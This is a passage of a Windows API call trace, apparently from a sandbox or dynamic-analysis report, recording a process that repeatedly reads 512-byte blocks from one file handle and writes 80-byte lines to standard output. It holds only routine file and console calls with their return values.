GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType 
(hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.837] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, 
lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, 
lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.838] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.839] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.840] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.840] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, 
lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: 
lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.841] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.841] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] 
GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 
[0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.843] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.843] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, 
